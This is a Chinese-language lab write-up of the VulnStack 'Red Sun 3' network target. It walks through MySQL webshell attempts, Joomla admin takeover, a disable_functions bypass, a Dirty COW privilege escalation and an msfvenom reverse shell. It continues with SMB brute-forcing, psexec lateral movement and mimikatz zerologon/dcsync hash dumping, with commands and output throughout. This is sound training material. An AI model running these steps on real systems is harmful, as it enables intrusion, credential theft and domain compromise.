VulnStack-紅日靶機三
概述
相交於前邊兩個靶場環境,靶場三的難度還是稍難一點,有很多兔子洞,這就考驗我們對已有資訊的取捨和試錯,以及對滲透測試優先順序的判斷。涉及到對資料庫操作的試錯,對 joomla 框架 cve 的快速學習,php 中 用到disabled_function 的 bypass ,對linux核心提權的取捨,對msf框架模組的熟悉與學習。包括了路由搭建、socks代理使用、smb服務爆破、psexec橫向、kiwi(mimikatz)使用等。還使用的crackmapexec這款強大的工具。
和各位師傅們一起學習
環境搭建
靶機地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/
下載完成後,發現 5 臺主機均為掛起狀態,賬號以預設登入。我們需要先對機器進行快照
新增一塊 192.168.93.0 網段的 VMnet2 僅主機網路卡,設定如下:
這裡名字只能是 VMnet2。如果你有 VMnet2,那麼修改一下啊網段就可以
在 centos 的主機,是雙網路卡我們啟動後要重啟網路服務,以後的橋接網路卡的 ip 地址
sevice network restart
其他四臺主機均為自定義的 host-only 的單網路卡機器。
將 kali 主機設定為橋接網路卡
完成環境搭建了
我的 kali 機器: 192.168.153.37
centos: 192.168.153.118,192.168.93.100
Ubantu: 192.168.93.120
Win7: 192.168.93.30
Win2012: 192.168.93.10
Win2008: 192.168.93.20
一、nmap 掃描
1)主機發現
sudo nmap -sn 192.168.153.0/24 -o hosts
MAC Address: 1E:C4:A8:26:3A:B4 (Unknown)
Nmap scan report for 192.168.153.118
Host is up.
看到 192.168.153.37 為新增加的 ip,應該就是 centos 靶機地址
2)埠掃描
sudo nmap -sT --min-rate 10000 -p- 192.168.153.118 -o ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-01 07:00 CST
Nmap scan report for 192.168.153.118
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
3)詳細資訊掃描
sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.153.118 -o details
Nmap scan report for 192.168.153.118
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2584c6cc2c8a7b8f4a7c60f1a3c9b022 (DSA)
|_ 2048 58d14c592d85ae0769240add720f45a5 (RSA)
80/tcp open http nginx 1.9.4
3306/tcp open mysql?
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 1 07:07:26 2024 -- 1 IP address (1 host up) scanned in 243.25 seconds
4)預設指令碼掃描
sudo nmap --script=vuln -p22,80,3306 192.168.153.118 -o vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-01 07:11 CST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 84.04% done; ETC: 07:12 (0:00:06 remaining)
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.40% done; ETC: 07:12 (0:00:04 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.90% done; ETC: 07:12 (0:00:04 remaining)
Nmap scan report for 192.168.153.118
Host is up (0.00018s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 333.79 seconds
看到有 ssh 和 mysql,可以先嚐試是否存在弱口令
hydra -C /usr/share/wordlists/legion/mysql-betterdefaultpasslist.txt mysql://192.168.153.118
看到了一組 mysql 的弱口令
二、mysql 滲透(失敗)
mysql -u root -h 192.168.153.118 -p123
MySQL [(none)]> show variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | |
+--------------------------+-------+
3 rows in set (0.028 sec)
看到 secure_file_priv 為空值,我們在紅日靶機一中就見過這種,可以嘗試寫 webshell 來獲得初始立足點
MySQL [(none)]> show variables like '%general%';
+------------------+---------------------------+
| Variable_name | Value |
+------------------+---------------------------+
| general_log | OFF |
| general_log_file | /var/lib/mysql/ubuntu.log |
+------------------+---------------------------+
2 rows in set (0.002 sec)
MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.017 sec)
走到這一步,我們遇到了一個問題,就是我們沒有 web 目錄的絕對路徑
在 web 服務中,看看有沒有這方面的資訊
嘗試目錄爆破(當然肯定要先翻 web 的 80 預設頁)
sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hide-length 172
這次爆破沒找到想要的資訊,我們可以透過指定副檔名,來獲得更加廣闊和精準的攻擊面
sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404,502 -x php,
zip,tar,txt
當讓我們也可以選擇多款不同的爆破工具,他們基於不同的演算法,會給我們想不到的收穫。
dirsearch.py -u http://192.168.153.118
當然我們在做目錄爆破時,要儘量全面。儘量避免由於資訊收集沒做好,從而導致自己丟失了最簡單有效的滲透路徑
最終我們找到了 configuration.php~,這個檔案中有我們想要的絕對路徑。
有這些資訊,我們有理由推測,絕對路徑就是 /var/www/html。當然這裡我們還有意外收穫,一組使用者的憑證
:testuser:cvcvgjASD!@,用著組憑證我們可以嘗試口令複用
1)嘗試 into outfile
前提
- secure_file_priv 為空值。這表示我們可以用 mysql 向任意位置寫入檔案
回到 mysql 這裡,我們嘗試執行
select "<?php system($_GET[cmd]); ?>" into outfile "/var/www/html/update.php"
MySQL [(none)]> select "<?php system($_GET[cmd]); ?>" into outfile "/var/www/html/update.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/update.php' (Errcode: 13 - Permission denied)
看到 Permission denied,看來內部應該還是有一些安全策略。這條路行不通了
2)嘗試日誌寫入
我們把日誌的輸出位置設定為 /var/www/html/lingx5.php
MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.001 sec)
MySQL [(none)]> set global general_log_file="/var/www/html/lingx5.php";
ERROR 29 (HY000): File '/var/www/html/lingx5.php' not found (Errcode: 13 - Permission denied)
MySQL [(none)]> show variables like '%general%';
+------------------+--------------------------+
| Variable_name | Value |
+------------------+--------------------------+
| general_log | OFF |
| general_log_file | /var/www/html/lingx5.php |
+------------------+--------------------------+
2 rows in set (0.001 sec)
可以看到,我們開啟了日誌,但是在修改日誌生成路徑時,它產生了報錯。
再次檢視日誌的配置,雖然路徑被成功修改了,但是它的日誌功能也被關閉了
這條路仍然是失敗的
三、web 滲透
我們在上面已經做了目錄爆破,都點開看看
發現他是一個 joomla 的 cms 框架,他也出現過漏洞,從未授權到 RCE
cve-2023-23752:https://vulncheck.com/blog/joomla-for-rce#cve-2023-23752-to-code-execution-1
有又想要了解的可以閱讀一下這篇文章,當然這裡我也會帶著大家操作。(針對這個靶場)
發現了預設的頁面,和後臺管理頁面 /administrator
我們可以去資料庫裡翻找一下,看有沒有使用者憑證
我們去到 joomla 資料庫,看到 am2zu_users 表
檢視列名,這也是我們在手工利用 sql 注入時的常用命令
select column_name from information_schema.columns where table_name="am2zu_users" and table_schema="joomla";
+---------------+
| column_name |
+---------------+
| id |
| name |
| username |
| email |
| password |
| block |
| sendEmail |
| registerDate |
| lastvisitDate |
| activation |
| params |
| lastResetTime |
| resetCount |
| otpKey |
| otep |
| requireReset |
+---------------+
16 rows in set (0.006 sec)
查詢使用者名稱,密碼
MySQL [joomla]> select id,name,username,password from am2zu_users;
+-----+------------+---------------+---------------------------------------------------
| id | name | username | password
+-----+------------+---------------+---------------------------------------------------
| 891 | Super User | administrator | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 |
+-----+------------+---------------+---------------------------------------------------
1 row in set (0.001 sec)
憑證:administrator:$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2
1)破解密碼
嘗試利用 hashcat 破解
hashcat creds /usr/share/wordlists/rockyou.txt --username -m 3200
hashcat creds /usr/share/wordlists/rockyou.txt --username -m 3200 --show
沒成功
2)修改密碼
在 joomla 的官方文件中找到了修改密碼的操作
文件:https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
根據它的 Method2,我們重置密碼
update am2zu_users set password = "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199" where username="administrator";
根據官方文件,我們已經把密碼憑證修改為了 administrator:secret
3)開始滲透
登陸成功,找到 Templates
加入程式碼
訪問
curl -X POST -d "cmd=phpinfo();" -u "administrator:secret" http://192.168.153.118/templates/beez3/index.php > index.html
xdg-open index.html
看到目標 php 開啟了 disable_functions 配置選項,禁用了許多程式碼執行的函式
三、獲得立足點
我們要 bypass disable_functions,繞過方法有很多,這裡可以使用蟻劍的外掛進行繞過
選擇繞過 disable_functions
選擇 PHP7_UserFilter 進行繞過
可以正常執行命令了,但是 ip a 命令顯示這是一臺 192.168.93.120 的機器,這應該是目標機器做了代理導致的
我們在 192.168.93.120 上面翻找比較敏感的檔案和資料夾
找到了 /tmp/mysql/test.txt
看到了一組憑據: wwwuser:wwwuser_123Aqx,嘗試口令複用,登陸 ssh
sudo ssh wwwuser@192.168.153.118 -o HostKeyAlgorithms=+ssh-rsa
Interface 3
============
Name : eth1
Hardware MAC : 00:0c:29:32:46:d3
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.93.100
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe32:46d3
IPv6 Netmask : ffff:ffff:ffff:ffff::
獲得了 192.168.153.118 的普通使用者許可權
至此我們已經那先了兩臺 linux 機器的普通使用者許可權,且 192.168.153.118 是雙網路卡機器,他的另一張網路卡為 192.168.93.100
四、linux 提權
因為這是靶機,在提權操作前建議先拍攝一張快照,以擴音權操作導致系統崩潰
因為我們要進行內網的進一步滲透,而這兩臺 linux 機器的許可權都比較低,所以要進行提權,以方便後續滲透
透過 sudo 和 suid 的資訊查詢,沒用可利用提權的命令
[wwwuser@localhost /]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
發現 192.168.153.118 這臺機器的核心是 2.6.32,可以在 searchsploit 上搜尋歷史漏洞
searchsploit kernel | grep 2.6.32
不算多,我們可以依次嘗試
1)9844(失敗)
python 9844.py
[+] PID:
sh: /proc//fd/1: 沒有那個檔案或目錄
[+] PID:
sh: /proc//fd/1: 沒有那個檔案或目錄
2)10018(失敗)
3)25444(失敗)
4)24459(失敗)
這個得需要有人執行 su - 並輸入 root 的正確密碼才能完成提權
5)dirtycow(成功)
熟悉髒牛漏洞(CVE-2016-5195)的,應該對 2.6.32 這個版本很敏感,因為這個版本在髒牛漏洞的影響範圍內
searchsploit dirty cow -m 40839
已經提權到 root
五、內網滲透
1)上線 msf
msf 框架整合了提權、憑據匯出、埠掃描、sockets 代理等多種功能,方便後續的內網滲透操作
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.153.37 lport=4444 -f elf > payload.elf
成功上線到 msf
2)新增內網路由
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > show options
msf6 post(multi/manage/autoroute) > set subnet 192.168.93.0
subnet => 192.168.93.0
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.93.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.153.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
3)內網初步探測
use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > set rhosts 192.168.93.2-254
rhosts => 192.168.93.2-254
msf6 auxiliary(scanner/discovery/udp_probe) > set threads 5
threads => 5
msf6 auxiliary(scanner/discovery/udp_probe) > run
發現了 192.168.93.10,192.168.93.20,192.168.93.30 三臺機器
4)socks 代理配置
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > exploit -j
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server
sudo apt install proxychains
修改 /etc/proxychains.conf 檔案,修改成 127.0.0.1 1080
5)主機詳細埠掃描
192.168.93.10
# Nmap 7.93 scan initiated Thu Oct 3 17:41:30 2024 as: nmap -o 10_win 192.168.93.10
Nmap scan report for 192.168.93.10
Host is up (1.1s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
192.168.93.20
# Nmap 7.93 scan initiated Thu Oct 3 17:42:21 2024 as: nmap -o 20_win 192.168.93.20
Nmap scan report for 192.168.93.20
Host is up (0.0030s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
192.168.93.30
# Nmap 7.93 scan initiated Thu Oct 3 17:40:44 2024 as: nmap -o 30_win 192.168.93.30
Nmap scan report for 192.168.93.30
Host is up (0.0022s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
看到都開起了 445 埠,嘗試爆破 smb 服務
hydra
proxychains hydra -l administrator -P '/usr/share/seclists/Passwords/500-worst-passwords.txt' smb://192.168.93.30
當然你也可以選擇 crackmapexec 或者 msf 的 smb 模組
crackmapexec
proxychains crackmapexec smb 192.168.93.30 -u administrator -p '123qwe!ASD' --local-auth
msf
use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/seclists/Passwords/500-worst-passwords.txt
pass_file => /usr/share/seclists/Passwords/500-worst-passwords.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:/root/passwd.txt',
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:123456',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:password',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:12345678',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:1234',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:pussy',
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.30:445 - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.30:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
爆破到憑據administrator:123qwe!ASD,可以登陸smb服務
6)利用smb橫向
use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.30
rhost => 192.168.93.30
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > run
成功利用smb上線到msf,而且是system許可權
當然這裡嘗試口令服用,發現192.168.93.20也是用的同樣的密碼
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (201798 bytes) to 192.168.93.20
[*] Meterpreter session 8 opened (192.168.93.100:54281 -> 192.168.93.20:4444 via session 2) at 2024-10-04 09:06:57 +0800
meterpreter >
在systeminfo中看到域資訊test.org
ping一下
C:\Windows\system32>ping test.org
ping test.org
Pinging test.org [192.168.93.10] with 32 bytes of data:
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.93.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
域控應該就是192.168.93.10了
net view
可以看到域內的三臺主機
7)域控橫向
判斷zerologon漏洞
meterpreter > load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords
meterpreter > kiwi_cmd lsadump::zerologon /target:WIN-8GA56TNV3MV.test.org /account:WIN-8GA56TNV3MV$
攻擊
meterpreter > kiwi_cmd lsadump::zerologon /target:WIN-8GA56TNV3MV.test.org /account:WIN-8GA56TNV3MV$ /exploit
攻擊成功,轉出hash值
kiwi_cmd lsadump::dcsync /domain:test.org /dc:WIN-8GA56TNV3MV.test.org /user:administrator /authuser:WIN-8GA56TNV3MV$ /authdomain:test /authpassword:"" /authntlm
Credentials:
Hash NTLM: 18edd0cc3227be3bf61ce198835a1d97
ntlm-0: 18edd0cc3227be3bf61ce198835a1d97
ntlm-1: c703941f8ce69a643264ac6f87955b2b
nt1m-2: 2bc31ee9ab29514308035203e98a727c
lm0: 9f8f8b3a6b02ebbc48586f9995cc6b69
lm-1: be62fe8aef5763fe44c55c5308ab9597
看到域控administrator使用者的ntlmhash是18edd0cc3227be3bf61ce198835a1d97
最後恢復域控伺服器的密碼,防止域控脫軌
kiwi_cmd lsadump::postzerologon /target:test.org /account:WIN-8GA56TNV3MV$
8)進行PTH攻擊(失敗)
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::pth /user:administrator /domain:test.org /ntlm:18edd0cc3227be3bf61ce198835a1d97
這裡失敗了
9)從win2008抓取
我們在上邊嘗試口令複用,發現2008的密碼和win7一樣都是123qwe!ASD
在2008上的meterpreter執行
meterpreter > load kiwi
meterpreter > creds_all
看到
上邊有域控的明文密碼
這裡我的機器的msf登陸不上域控
10)用crackmapexec驗證
proxychains crackmapexec smb 192.168.93.10 -u administrator -p 'zxcASDqw123!!'
看到成功,可以訪問域控
總結
透過nmap掃描,我們發現一臺centos的web機器對外開放,透過對mysql getshell的試錯,同時對web端的joomla框架進行公開漏洞cve-2023-23752的利用以及bypass disable_functions,獲得了另一臺ubuntu機器的立足點,在ubuntu裡查詢資訊,找到了centos的憑證資訊,利用dirtycow(髒牛)漏洞提權到了root。
利用雙網路卡機器centos,搭建路由代理,橫向到內網,爆破smb服務得到win7的密碼憑證,同時進行口令複用獲得了server2008機器的shell,在2008利用mimikatz抓取密碼,最終拿下域控